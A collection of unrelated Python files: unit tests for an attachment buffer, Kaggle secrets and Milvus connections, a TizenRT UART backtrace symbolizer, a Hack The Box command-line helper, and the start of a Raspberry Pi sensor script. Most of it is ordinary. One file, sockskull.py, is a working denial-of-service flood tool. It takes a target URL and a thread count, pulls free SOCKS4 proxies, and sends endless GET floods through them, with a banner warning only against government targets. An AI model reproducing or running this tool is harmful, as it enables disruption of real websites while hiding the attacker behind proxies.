self.assertEqual(False, self.sf.Produce([real_event, fake_event]))
# Make sure source file still exists since Produce failed.
self.assertTrue(os.path.isfile(path))
# Make sure attachments_dir is empty.
self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
def testPartFailMoveAttachmentOneEvent(self):
"""Tests moving two attachments in a single event (real and fake)."""
self._CreateBuffer({'copy_attachments': False})
with file_utils.UnopenedTemporaryFile() as path:
event = datatypes.Event({}, {
'a': path,
'b': '/tmp/non_existent_file'})
self.assertEqual(False, self.sf.Produce([event]))
# Make sure source file still exists since Produce failed.
self.assertTrue(os.path.isfile(path))
# Make sure attachments_dir is empty.
self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
def testTruncateAttachments(self):
    """Tests that truncate removes attachments of truncated events."""
    FILE_STRING = 'Hello World!'
    with file_utils.UnopenedTemporaryFile() as path:
        with open(path, 'w') as f:
            f.write(FILE_STRING)
        event = datatypes.Event({}, {'a': path})
        self.sf.Produce([event])
        self.assertEqual(1, self._CountAttachmentsInBuffer(self.sf))
        # truncate_attachments=False must leave the attachment in place.
        self.sf.buffer_file.Truncate(truncate_attachments=False)
        self.assertEqual(1, self._CountAttachmentsInBuffer(self.sf))
        # Default Truncate removes attachments of truncated events.
        self.sf.buffer_file.Truncate()
        self.assertEqual(0, self._CountAttachmentsInBuffer(self.sf))
if __name__ == '__main__':
    # Route INFO-level log output to a stream handler while the tests run.
    log_utils.InitLogging(log_utils.GetStreamHandler(logging.INFO))
    unittest.main()
|
test_user_secrets.py | import json
import os
import threading
import unittest
from http.server import BaseHTTPRequestHandler, HTTPServer
from test.support import EnvironmentVarGuard
from urllib.parse import urlparse
from google.auth.exceptions import DefaultCredentialsError
from google.cloud import bigquery
from kaggle_secrets import (_KAGGLE_URL_BASE_ENV_VAR_NAME,
_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME,
CredentialError, UserSecretsClient, BackendError)
_TEST_JWT = 'test-secrets-key'
class UserSecretsHTTPHandler(BaseHTTPRequestHandler):
    """Base handler for a fake user-secrets HTTP endpoint.

    Subclasses supply the request-capture hook (set_request) and the
    canned JSON payload (get_response); this class handles the HTTP
    mechanics.
    """

    def set_request(self):
        # Must be overridden to record the incoming request.
        raise NotImplementedError()

    def get_response(self):
        # Must be overridden to provide the JSON-serializable reply.
        raise NotImplementedError()

    def do_HEAD(self):
        # Simple health check: acknowledge with 200, no body.
        self.send_response(200)

    def do_POST(self):
        # Let the subclass capture the request, then reply with its payload.
        self.set_request()
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        self.end_headers()
        payload = json.dumps(self.get_response()).encode("utf-8")
        self.wfile.write(payload)
class TestUserSecrets(unittest.TestCase):
    """Tests for UserSecretsClient against a local fake HTTP server."""

    # Parsed base URL of the fake server; evaluated at import time.
    # NOTE(review): assumes the env var is always set — urlparse would fail
    # on None otherwise; confirm against the CI environment.
    SERVER_ADDRESS = urlparse(os.getenv(_KAGGLE_URL_BASE_ENV_VAR_NAME))

    def _test_client(self, client_func, expected_path, expected_body, secret=None, success=True):
        """Run client_func against a fake server; verify the request it sent."""
        _request = {}

        class AccessTokenHandler(UserSecretsHTTPHandler):
            def set_request(self):
                # Capture path, parsed JSON body and headers for assertions.
                _request['path'] = self.path
                content_len = int(self.headers.get('Content-Length'))
                _request['body'] = json.loads(self.rfile.read(content_len))
                _request['headers'] = self.headers

            def get_response(self):
                if success:
                    return {'result': {'secret': secret, 'secretType': 'refreshToken', 'secretProvider': 'google'}, 'wasSuccessful': "true"}
                else:
                    return {'wasSuccessful': "false"}

        env = EnvironmentVarGuard()
        env.set(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME, _TEST_JWT)
        with env:
            # Serve on a background thread so client_func runs synchronously;
            # shutdown() is always called even if the client raises.
            with HTTPServer((self.SERVER_ADDRESS.hostname, self.SERVER_ADDRESS.port), AccessTokenHandler) as httpd:
                threading.Thread(target=httpd.serve_forever).start()
                try:
                    client_func()
                finally:
                    httpd.shutdown()

        path, headers, body = _request['path'], _request['headers'], _request['body']
        self.assertEqual(
            path,
            expected_path,
            msg="Fake server did not receive the right request from the UserSecrets client.")
        self.assertEqual(
            body,
            expected_body,
            msg="Fake server did not receive the right body from the UserSecrets client.")

    def test_no_token_fails(self):
        """Constructing a client without the token env var must raise."""
        env = EnvironmentVarGuard()
        env.unset(_KAGGLE_USER_SECRETS_TOKEN_ENV_VAR_NAME)
        with env:
            with self.assertRaises(CredentialError):
                client = UserSecretsClient()

    def test_get_access_token_succeeds(self):
        """Happy path: the secret returned by the server is surfaced."""
        secret = '12345'

        def call_get_access_token():
            client = UserSecretsClient()
            secret_response = client.get_bigquery_access_token()
            self.assertEqual(secret_response, secret)

        self._test_client(call_get_access_token,
                          '/requests/GetUserSecretRequest', {'Target': 1, 'JWE': _TEST_JWT}, secret=secret)

    def test_get_access_token_handles_unsuccessful(self):
        """A wasSuccessful=false reply must raise BackendError."""
        def call_get_access_token():
            client = UserSecretsClient()
            with self.assertRaises(BackendError):
                client.get_bigquery_access_token()

        self._test_client(call_get_access_token,
                          '/requests/GetUserSecretRequest', {'Target': 1, 'JWE': _TEST_JWT}, success=False)
|
symbolviewer.py | ###########################################################################
#
# Copyright 2019 Samsung Electronics All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
###########################################################################
from collections import OrderedDict
from operator import eq
import subprocess
import serial
import threading
import time
import sys
isExit = False
def rxfromUART(port):
    """Reader loop: echo UART output, symbolizing callstack addresses.

    While inside an "unwind_backtrace_with_fp" callstack dump, lines of the
    form "...[<address>" are resolved to source locations with addr2line
    against the tinyara ELF; traffic outside a dump is echoed verbatim.
    """
    global isExit
    isStackInfo = False
    # Offset of the hex address within a backtrace line.
    length = len("unwind_backtrace_with_fp: [<")
    while(isExit == False):
        time.sleep(0.01)
        lines = port.readlines()
        # NOTE(review): pyserial readlines() returns [] on timeout, not None,
        # so this guard appears to be a no-op — confirm before relying on it.
        if lines == None:
            continue
        for line in lines:
            if line.find("unwind_backtrace_with_fp: Call Stack:") != -1:
                isStackInfo = True
            elif line.find("unwind_frame_with_fp: End of Callstack") != -1:
                isStackInfo = False
            if isStackInfo == True:
                if line.find("unwind_backtrace_with_fp: [<") != -1:
                    # Line shape: "unwind_backtrace_with_fp: [<0x........>]".
                    addr = line[length: length + 10]
                    # Resolve the address to file:line via the ELF's debug info.
                    proc = subprocess.Popen(["addr2line" ,
                                             "-e" ,
                                             "../../build/output/bin/tinyara",
                                             addr], stdout=subprocess.PIPE)
                    ouput, err = proc.communicate()
                    time.sleep(0.01)
                    sys.stdout.write( "%s \t: %s" % ((line), ouput.decode('utf-8')))
            else:
                sys.stdout.write( "%s" % (line))
def txtoUART(port, send):
    """Write `send` to the given serial port, ensuring a trailing newline.

    Fix: the body previously wrote to the module-global PORT instead of the
    `port` parameter, so the argument was silently ignored.
    """
    if send.find("\n") != -1:
        port.write((send).encode())
    else:
        port.write((send + "\n").encode())
def wait2commnad(port):
    """Forward each stdin line to the UART until the user types "exit".

    Typing "exit" flips the shared isExit flag so both worker threads and
    the main loop terminate.
    """
    global isExit
    cmd = ""
    while not isExit:
        time.sleep(0.1)
        cmd = sys.stdin.readline()
        # Removed a dead `cmd.strip()` whose return value was discarded;
        # readline() keeps the trailing newline, hence the "exit\n" compare.
        if eq(cmd, "exit\n"):
            isExit = True
            break
        txtoUART(port, cmd)
if (__name__ == '__main__'):
    # init: open the UART named on the command line at 115200 baud.
    PORT = serial.Serial(sys.argv[1], baudrate=115200, timeout=0.1)
    # Reader thread: echoes and symbolizes incoming UART traffic.
    rxthread = threading.Thread(target=rxfromUART,args=(PORT,))
    rxthread.daemon = True
    rxthread.start()
    # Writer thread: forwards stdin commands to the UART.
    txthread = threading.Thread(target=wait2commnad, args=(PORT,))
    txthread.daemon = True
    txthread.start()
    # Idle until a worker flips isExit (via the "exit" command).
    while(isExit == False):
        time.sleep(0.1)
    if (isExit == True):
        txthread.join()
        rxthread.join()
|
htb.py | #!/usr/bin/python
from bs4 import BeautifulSoup
import json
import threading
import requests
import time
from os.path import realpath, dirname
import sys
import netifaces as net
from chats import apikey
args = sys.argv
# No sub-command given: print the usage banner and exit.
if len(args) == 1:
    print """\033[96m[+] \033[92mTry These Commands:
\033[96m[+] \033[92mhtb chat {Starts a terminal chat client}
\033[96m[+] \033[92mhtb chat shout {See all messages like resets}
\033[96m[+] \033[92mhtb reset machine {Resets A Machine}
\033[96m[+] \033[92mhtb machine/challenge pro/sucks {rates a machine or challenge}
\033[96m[+] \033[92mhtb sendmsg yourmessage {send a quick message to shoutbox}
\033[96m[+] \033[92mhtb respect user {respects a user}
\033[96m[+] \033[92mhtb startvpn {starts openvpn in background}
\033[96m[+] \033[92mhtb ip {Shows your plain hackthebox ip}
\033[96m[+] \033[92mhtb stopvpn {stops openvpn}
\033[96m[+] \033[92mhtb updatevpn {updates hackthebox vpn}
\033[96m[+] \033[92mhtb switchvpn {Switch between htb vpn labs}
"""
    exit()
# Only needed by the command branches below.
from os import system
# Browser-like User-Agent for all requests to hackthebox.eu.
# NOTE(review): presumably required to avoid bot filtering — verify.
headers = {'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0'}
def updatevpn():
base_path = dirname(realpath(sys.argv[0]))+"/"
file = open(base_path+"cookies.txt","r")
cont = file.read()
f = json.loads(cont)
vpd = requests.get('https://www.hackthebox.eu/home/htb/access/ovpnfile', cookies=f,headers=headers)
ovpn = open(base_path+'htb.ovpn', 'w')
ovpn.write(vpd.content)
ovpn.close()
print "[+] Updated Vpn"
if args[1] == "chat":
    system("clear")
    print "\033[96m[+] \033[92mTip: You Can Send Any Message Just Type On The Terminal :) \n"
    from getchats import *
    # Print the existing chat history once.
    get_message()
    # Optional second argument turns on verbose mode (show shouts/resets).
    try:
        arg2 = args[2]
    except:
        arg2 = ""
    def background():
        # Poll the shoutbox for new messages every 10 s on a daemon thread.
        while True:
            time.sleep(10)
            if arg2 != "":
                get_last_message(quite=False)
            else:
                get_last_message(quite=True)
    threading1 = threading.Thread(target=background)
    threading1.daemon = True
    threading1.start()
    help = '''
\033[92m[+]\033[97m \033[91mAvailable Commands:
\033[92m[+]\033[97m \033[91m/help \033[90m :: Returns this text
\033[92m[+]\033[97m \033[91m/respect \033[93m<username> \033[90m :: Gives respect to selected user.
\033[92m[+]\033[97m \033[91m/reset \033[93m<machine> \033[90m :: Resets the specified machine.
\033[92m[+]\033[97m \033[91m/cancel \033[93m<reset_id> \033[90m :: Cancels a pending reset.
\033[92m[+]\033[97m \033[91m/rate \033[93m<machine/challenge> \033[96m<pro/sucks> \033[90m :: Rates the machine accordingly.
\033[92m[+]\033[97m \033[91m/slap \033[93m<username> \033[90m :: Slaps the user.
\033[92m[+]\033[97m \033[91m/shame \033[93m<username> \033[90m :: Shames the user.
\033[92m[+]\033[97m \033[91m/beer \033[93m<username> \033[90m :: Offers a beer to user.
\033[92m[+]\033[97m \033[91m/milk \033[93m<username> \033[90m :: Offers a milk bottle to user.
\033[92m[+]\033[97m \033[91m/cocktail \033[93m<username> \033[90m :: Offers a cocktail to a stressed user.
\033[92m[+]\033[97m \033[91m/poke \033[93m<username> \033[90m :: Pokes a user.
\033[92m[+]\033[97m \033[91mAdmin-Only Commands:
\033[92m[+]\033[97m \033[91m/powerofthor \033[93m<username> \033[90m :: Bans resets/cancels/shouts of user for 5 minutes.\033[92m
    '''
    # Interactive loop: each typed line is sent to the shoutbox; the ANSI
    # escapes erase the locally-typed line so only the server echo shows.
    while True:
        try:
            mymessage = raw_input("\033[92m")
            sys.stdout.write("\033[F")
            sys.stdout.write("\033[K")
            if mymessage == "/help":
                print help
            elif mymessage == "":
                sys.stdout.write("\033[F")
                sys.stdout.write("\033[K")
            elif mymessage == "/quite":
                quite = False
                sys.stdout.write("\033[F")
                sys.stdout.write("\033[K")
            else:
                requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":mymessage})
        except:
            # Ctrl-C / EOF: clear the screen and leave.
            system("clear")
            exit("Thank You")
elif args[1] == "reset":
try:
nameofbox = "/reset "+args[2]
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
cont = r.content
if 'Invalid' in cont:
print "[!] Machine does not exist."
elif 'will be reset' in cont:
print "[+] reset requested successfully"
except:
nameofbox = raw_input("Name of box > ")
nameofbox = "/respect "+nameofbox
r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
cont = r.content
if 'Invalid' in cont:
print "[!] Machine does not exist."
elif 'will be reset' in cont:
print "[+] reset requested successfully"
elif args[1] == "respect":
    # Give respect to a user via the shoutbox "/respect" command.
    try:
        nameofuser = "/respect "+args[2]
        r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofuser})
        cont = r.content
        if 'invalid user' in cont:
            print "[!] User Not Found."
        elif 'User respected' in cont:
            print "[+] User respected successfully"
    except:
        # No username on the command line: prompt for one.
        nameofuser = raw_input("Name of user > ")
        nameofuser = "/respect "+nameofuser
        r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofuser})
        cont = r.content
        if 'invalid user' in cont:
            print "[!] User Not Found."
        elif 'User respected' in cont:
            print "[+] User respected successfully"
elif args[1] == "rate":
    # Rate a machine/challenge: "/rate <name> <pro|sucks>".
    try:
        nameofbox = "/rate "+args[2] + " " + args[3]
        r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
    except:
        rt = raw_input("rate pro/sucks > ")
        nameofbox = raw_input("Name of box or challenge > ")
        nameofbox = "/rate "+ nameofbox + " " + rt
        r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":nameofbox})
elif args[1] == "sendmsg":
    # Post a one-off message to the shoutbox.
    try:
        msg = args[2]
        r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":msg})
        cont = r.content
        if 'success' in cont:
            print "Message Sent!"
        else:
            print 'There was some problem'
    except:
        msg = raw_input('> ')
        r = requests.post("https://www.hackthebox.eu/api/shouts/new/?api_token="+apikey, data={"text":msg})
        cont = r.content
        if 'success' in cont:
            print "Message Sent!"
        else:
            print 'There was some problem'
elif args[1] == "startvpn":
    # NOTE(review): reads /tmp/htb.ovpn, but updatevpn writes the profile
    # to <script_dir>/htb.ovpn — confirm which path is intended.
    cmd = "openvpn --config /tmp/htb.ovpn --daemon"
    system(cmd)
    print "[+] Started Vpn"
elif args[1] == "ip":
    # Print the lab IP assigned on the tun0 VPN interface.
    try:
        net.ifaddresses('tun0')
        ip = net.ifaddresses('tun0')[net.AF_INET][0]['addr']
        print ip
    except:
        print "[+] Please connect first"
elif args[1] == "stopvpn":
    # Issued twice in case the first signal is missed.
    system("pkill -9 openvpn")
    system("pkill -9 openvpn")
    print "[+] Stopped Vpn"
elif args[1] == "updatevpn":
    updatevpn()
elif args[1] == "switchvpn":
    # List the available labs from the access page and switch to the chosen one.
    base_path = dirname(realpath(sys.argv[0]))+"/"
    file = open(base_path+"cookies.txt","r")
    cont = file.read()
    f = json.loads(cont)
    r = BeautifulSoup(requests.get('https://www.hackthebox.eu/home/htb/access',cookies=f,headers=headers).content,"lxml")
    labs = r.find_all('div',class_="panel-heading")
    switch = []
    for i in labs:
        if 'Switch' in i.text:
            switch.append(i)
    for i in range(len(switch)):
        print "[{id}] {name}".format(id=i, name=switch[i].text.strip())
    id = raw_input("ID> ")
    try:
        if int(id) > (len(switch)-1):
            print "[-] Please Chose From Above"
            exit()
    except:
        print "[-] Please Chose From Above"
        exit()
    # Extract the lab identifier from the button's onclick attribute.
    labname = labs[int(id)].contents[1].contents[1]['onclick'][11:][:-2]
    requests.post('https://www.hackthebox.eu/api/labs/switch/'+labname,params={"api_token":apikey},headers=headers).content
    print "[+] Changed To "+labs[int(id)].text.strip().split(' ')[1]
    # Fetch the profile for the newly selected lab.
    updatevpn()
else:
    print "[-] Unknown Command"
|
sockskull.py | ###########################################
# This Script Is Code By GogoZin #
# Can Use In Stress Test #
# But Don't Attack Any Gov Site #
# If Want Me To Keep Update #
###########################################
import requests
import random
import time
import threading
from colorama import Fore
print(Fore.GREEN + """ .,:ccllllc:,.
.lOXWMMMMMMMMMWXOo,
.lKWMMMMMMMMMMMMMMMMNk:.
.oKWMMMMMMMMMMMMMMMMMMMMNx'
.xWMMMMMMMMMMMMMMMMMMMMMMMWO'
;KMMMMMMMMMMMMMMMMMMMMMMMMMWd.
:XNKXWMMMMMMMMMMMMMMMMMMNXXWk.
;Kx..:d0NMMMMMMMMMMMMXkc,.;0d.
.OO' .,oOXWMMMMNKkc' c0:
:KOc,.....:xXNNKd,....';oKk.
cXMWXK000XOlccdKK00KXNWMNc
.dWMMWX0XMNdcocckMMWX00NMNl
.oXX0o..oWWNNWNXNMMK; .oKx'
.... cNXNNXXXOKWx. ..
,KKKX000OKK;
'0KKX0KK0X0'
.OK0XKKK0XO.
.k00K0K00Xk.
ldxOxOkx0o
..',,;,',.
""")
print(" CC Attack Tool Using Requests Module")
print(" Code By GogoZin. -2019/8/2")
print(" Last Update In 2019/8/10")
#Code By GogoZin
def opth():
for i in range(thr):
x = threading.Thread(target=atk)
x.start()
print("Threads " + str(i+1) + " Created")
print("Wait A Few Seconds For Threads Ready To Attack ...")
time.sleep(3)
input("Press Enter To Launch Attack !")
global on
on = True
on = False
def main():
global pprr
global list
global proxy
global url
global pwr
global thr
global on
url = str(input(Fore.BLUE + "Target : " + Fore.WHITE))
thr = int(input(Fore.BLUE + "Threads : " + Fore.WHITE))
cho = str(input(Fore.BLUE + "Get Some Fresh Socks ? (y/n) : " + Fore.WHITE))
if cho =='y':
rsp = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&timeout=1000&country=all') #Code By GogoZin
with open('socks.txt','wb') as fp:
fp.write(rsp.content)
print(Fore.YELLOW + "Sucess Get Fresh Socks List !")
else:
pass
list = str(input(Fore.BLUE + "Socks List (socks.txt): " + Fore.WHITE))
if list =="":
list = 'socks.txt'
else:
list = str(list)
pprr = open(list).readlines()
print(Fore.BLUE + "Socks Count : " + Fore.WHITE + "%d " %len(pprr))
pwr = int(input(Fore.BLUE + "CC.Power (1-100) : " + Fore.WHITE))
opth()
def atk():
pprr = open(list).readlines()
proxy = random.choice(pprr).strip().split(":")
s = requests.session()
s.proxies = {}
s.proxies['http'] = ("socks4://"+str(proxy[0])+":"+str(proxy[1]))
s.proxies['https'] = ("socks4://"+str(proxy[0])+":"+str(proxy[1]))
time.sleep(10)
while True:
while on:
try:
s.get(url)
#Code By GogoZin
try:
for y in range(pwr):
s.get(url)
print(Fore.BLUE + "Socks CC Flood From ~[ " + Fore.WHITE + str(proxy[0])+":"+str(proxy[1]) + Fore.BLUE + " ] " + Fore.WHITE)
s.close
except:
s.close()
except:
s.close()
print(Fore.RED + "Can't Connet To This Socks . . . Skip ~>" + Fore.WHITE)
if __name__ == "__main__":
main()
|
test_connect.py | import pytest
import pdb
import threading
from multiprocessing import Process
from utils import *
CONNECT_TIMEOUT = 12
class TestConnect:
    """Connect/disconnect behaviour tests for the Milvus client."""

    def local_ip(self, args):
        '''
        check if ip is localhost or not
        '''
        if not args["ip"] or args["ip"] == 'localhost' or args["ip"] == "127.0.0.1":
            return True
        else:
            return False

    def test_disconnect(self, connect):
        '''
        target: test disconnect
        method: disconnect a connected client
        expected: connect failed after disconnected
        '''
        res = connect.disconnect()
        assert res.OK()
        # Any RPC after disconnect must raise.
        with pytest.raises(Exception) as e:
            res = connect.server_version()

    def test_disconnect_repeatedly(self, connect, args):
        '''
        target: test disconnect repeatedly
        method: disconnect a connected client, disconnect again
        expected: raise an error after disconnected
        '''
        if not connect.connected():
            # Fixture client already dropped: build a fresh connection first.
            milvus = get_milvus(args["handler"])
            uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
            milvus.connect(uri=uri_value)
            res = milvus.disconnect()
            with pytest.raises(Exception) as e:
                res = milvus.disconnect()
        else:
            res = connect.disconnect()
            with pytest.raises(Exception) as e:
                res = connect.disconnect()

    def test_connect_correct_ip_port(self, args):
        '''
        target: test connect with correct ip and port value
        method: set correct ip and port
        expected: connected is True
        '''
        milvus = get_milvus(args["handler"])
        milvus.connect(host=args["ip"], port=args["port"])
        assert milvus.connected()

    def test_connect_connected(self, args):
        '''
        target: test connect and disconnect with correct ip and port value, assert connected value
        method: set correct ip and port
        expected: connected is False
        '''
        milvus = get_milvus(args["handler"])
        milvus.connect(host=args["ip"], port=args["port"])
        milvus.disconnect()
        assert not milvus.connected()

    # TODO: Currently we test with remote IP, localhost testing need to add
    def _test_connect_ip_localhost(self, args):
        '''
        target: test connect with ip value: localhost
        method: set host localhost
        expected: connected is True
        '''
        milvus = get_milvus(args["handler"])
        milvus.connect(host='localhost', port=args["port"])
        assert milvus.connected()

    @pytest.mark.timeout(CONNECT_TIMEOUT)
    def test_connect_wrong_ip_null(self, args):
        '''
        target: test connect with wrong ip value
        method: set host null
        expected: not use default ip, connected is False
        '''
        milvus = get_milvus(args["handler"])
        ip = ""
        with pytest.raises(Exception) as e:
            milvus.connect(host=ip, port=args["port"], timeout=1)
        assert not milvus.connected()

    def test_connect_uri(self, args):
        '''
        target: test connect with correct uri
        method: uri format and value are both correct
        expected: connected is True
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        milvus.connect(uri=uri_value)
        assert milvus.connected()

    def test_connect_uri_null(self, args):
        '''
        target: test connect with null uri
        method: uri set null
        expected: connected is True
        '''
        milvus = get_milvus(args["handler"])
        uri_value = ""
        if self.local_ip(args):
            # Empty uri falls back to localhost defaults, so this succeeds.
            milvus.connect(uri=uri_value, timeout=1)
            assert milvus.connected()
        else:
            with pytest.raises(Exception) as e:
                milvus.connect(uri=uri_value, timeout=1)
            assert not milvus.connected()

    @pytest.mark.level(2)
    @pytest.mark.timeout(CONNECT_TIMEOUT)
    def test_connect_wrong_uri_wrong_port_null(self, args):
        '''
        target: test uri connect with port value wouldn't connected
        method: set uri port null
        expected: connected is True
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:" % args["ip"]
        with pytest.raises(Exception) as e:
            milvus.connect(uri=uri_value, timeout=1)

    @pytest.mark.level(2)
    @pytest.mark.timeout(CONNECT_TIMEOUT)
    def test_connect_wrong_uri_wrong_ip_null(self, args):
        '''
        target: test uri connect with ip value wouldn't connected
        method: set uri ip null
        expected: connected is True
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://:%s" % args["port"]
        with pytest.raises(Exception) as e:
            milvus.connect(uri=uri_value, timeout=1)
        assert not milvus.connected()

    # disable
    def _test_connect_with_multiprocess(self, args):
        '''
        target: test uri connect with multiprocess
        method: set correct uri, test with multiprocessing connecting
        expected: all connection is connected
        '''
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        process_num = 10
        processes = []

        def connect(milvus):
            milvus.connect(uri=uri_value)
            # A second connect on the same client must raise.
            with pytest.raises(Exception) as e:
                milvus.connect(uri=uri_value)
            assert milvus.connected()

        for i in range(process_num):
            milvus = get_milvus(args["handler"])
            p = Process(target=connect, args=(milvus, ))
            processes.append(p)
            p.start()
        for p in processes:
            p.join()

    def test_connect_repeatedly(self, args):
        '''
        target: test connect repeatedly
        method: connect again
        expected: status.code is 0, and status.message shows have connected already
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        milvus.connect(uri=uri_value)
        milvus.connect(uri=uri_value)
        assert milvus.connected()

    def test_connect_disconnect_repeatedly_once(self, args):
        '''
        target: test connect and disconnect repeatedly
        method: disconnect, and then connect, assert connect status
        expected: status.code is 0
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        milvus.connect(uri=uri_value)
        milvus.disconnect()
        milvus.connect(uri=uri_value)
        assert milvus.connected()

    def test_connect_disconnect_repeatedly_times(self, args):
        '''
        target: test connect and disconnect for 10 times repeatedly
        method: disconnect, and then connect, assert connect status
        expected: status.code is 0
        '''
        times = 10
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        milvus.connect(uri=uri_value)
        for i in range(times):
            milvus.disconnect()
            milvus.connect(uri=uri_value)
        assert milvus.connected()

    # TODO: enable
    def _test_connect_disconnect_with_multiprocess(self, args):
        '''
        target: test uri connect and disconnect repeatedly with multiprocess
        method: set correct uri, test with multiprocessing connecting and disconnecting
        expected: all connection is connected after 10 times operation
        '''
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        process_num = 4
        processes = []

        def connect(milvus):
            milvus.connect(uri=uri_value)
            milvus.disconnect()
            milvus.connect(uri=uri_value)
            assert milvus.connected()

        for i in range(process_num):
            milvus = get_milvus(args["handler"])
            p = Process(target=connect, args=(milvus, ))
            processes.append(p)
            p.start()
        for p in processes:
            p.join()

    def test_connect_param_priority_no_port(self, args):
        '''
        target: both host_ip_port / uri are both given, if port is null, use the uri params
        method: port set "", check if wrong uri connection is ok
        expected: connect raise an exception and connected is false
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:39540" % args["ip"]
        with pytest.raises(Exception) as e:
            milvus.connect(host=args["ip"], port="", uri=uri_value)

    def test_connect_param_priority_uri(self, args):
        '''
        target: both host_ip_port / uri are both given, if host is null, use the uri params
        method: host set "", check if correct uri connection is ok
        expected: connected is False
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        with pytest.raises(Exception) as e:
            milvus.connect(host="", port=args["port"], uri=uri_value, timeout=1)
        assert not milvus.connected()

    # Disable, (issue: https://github.com/milvus-io/milvus/issues/288)
    def _test_connect_param_priority_both_hostip_uri(self, args):
        '''
        target: both host_ip_port / uri are both given, and not null, use the uri params
        method: check if wrong uri connection is ok
        expected: connect raise an exception and connected is false
        '''
        milvus = get_milvus(args["handler"])
        uri_value = "tcp://%s:%s" % (args["ip"], args["port"])
        with pytest.raises(Exception) as e:
            res = milvus.connect(host=args["ip"], port=39540, uri=uri_value, timeout=1)
            # NOTE(review): `logging` is not imported here directly —
            # presumably provided by `from utils import *`; confirm.
            logging.getLogger().info(res)
        # assert not milvus.connected()

    def _test_add_vector_and_disconnect_concurrently(self):
        '''
        Target: test disconnect in the middle of add vectors
        Method:
            a. use coroutine or multi-processing, to simulate network crashing
            b. data_set not too large incase disconnection happens when data is under-preparing
            c. data_set not too small incase disconnection happens when data has already been transferred
            d. make sure disconnection happens when data is in-transport
        Expected: Failure, get_table_row_count == 0
        '''
        pass

    def _test_search_vector_and_disconnect_concurrently(self):
        '''
        Target: Test disconnect in the middle of search vectors(with large nq and topk)multiple times, and search/add vectors still work
        Method:
            a. coroutine or multi-processing, to simulate network crashing
            b. connect, search and disconnect, repeating many times
            c. connect and search, add vectors
        Expected: Successfully searched back, successfully added
        '''
        pass

    def _test_thread_safe_with_one_connection_shared_in_multi_threads(self):
        '''
        Target: test 1 connection thread safe
        Method: 1 connection shared in multi-threads, all adding vectors, or other things
        Expected: Functional as one thread
        '''
        pass
class TestConnectIPInvalid(object):
    """
    Test connect server with invalid ip
    """
    @pytest.fixture(
        scope="function",
        params=gen_invalid_ips()
    )
    def get_invalid_ip(self, request):
        # Parametrized fixture: yields each invalid ip in turn.
        yield request.param

    @pytest.mark.level(2)
    @pytest.mark.timeout(CONNECT_TIMEOUT)
    def test_connect_with_invalid_ip(self, args, get_invalid_ip):
        """Connecting with any invalid ip must raise and stay disconnected."""
        milvus = get_milvus(args["handler"])
        ip = get_invalid_ip
        with pytest.raises(Exception) as e:
            milvus.connect(host=ip, port=args["port"], timeout=1)
        assert not milvus.connected()
class TestConnectPortInvalid(object):
    """
    Test connect server with invalid port
    """
    @pytest.fixture(
        scope="function",
        params=gen_invalid_ports()
    )
    def get_invalid_port(self, request):
        # Parametrized fixture: yields each invalid port in turn.
        yield request.param

    @pytest.mark.level(2)
    @pytest.mark.timeout(CONNECT_TIMEOUT)
    def test_connect_with_invalid_port(self, args, get_invalid_port):
        '''
        target: test ip:port connect with invalid port value
        method: set port in gen_invalid_ports
        expected: connected is False
        '''
        milvus = get_milvus(args["handler"])
        port = get_invalid_port
        with pytest.raises(Exception) as e:
            milvus.connect(host=args["ip"], port=port, timeout=1)
        assert not milvus.connected()
class TestConnectURIInvalid(object):
    """
    Test connect server with invalid uri
    """
    @pytest.fixture(
        scope="function",
        params=gen_invalid_uris()
    )
    def get_invalid_uri(self, request):
        # Parametrized fixture: yields each invalid uri in turn.
        yield request.param

    @pytest.mark.level(2)
    @pytest.mark.timeout(CONNECT_TIMEOUT)
    def test_connect_with_invalid_uri(self, get_invalid_uri, args):
        '''
        target: test uri connect with invalid uri value
        method: set port in gen_invalid_uris
        expected: connected is False
        '''
        milvus = get_milvus(args["handler"])
        uri_value = get_invalid_uri
        with pytest.raises(Exception) as e:
            milvus.connect(uri=uri_value, timeout=1)
        assert not milvus.connected()
|
distancia.py | import RPi.GPIO as GPIO
import time
import threading
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
# Ultrasonic sensor pins (physical/BOARD numbering).
ECHO_DIR = 29  # right sensor echo
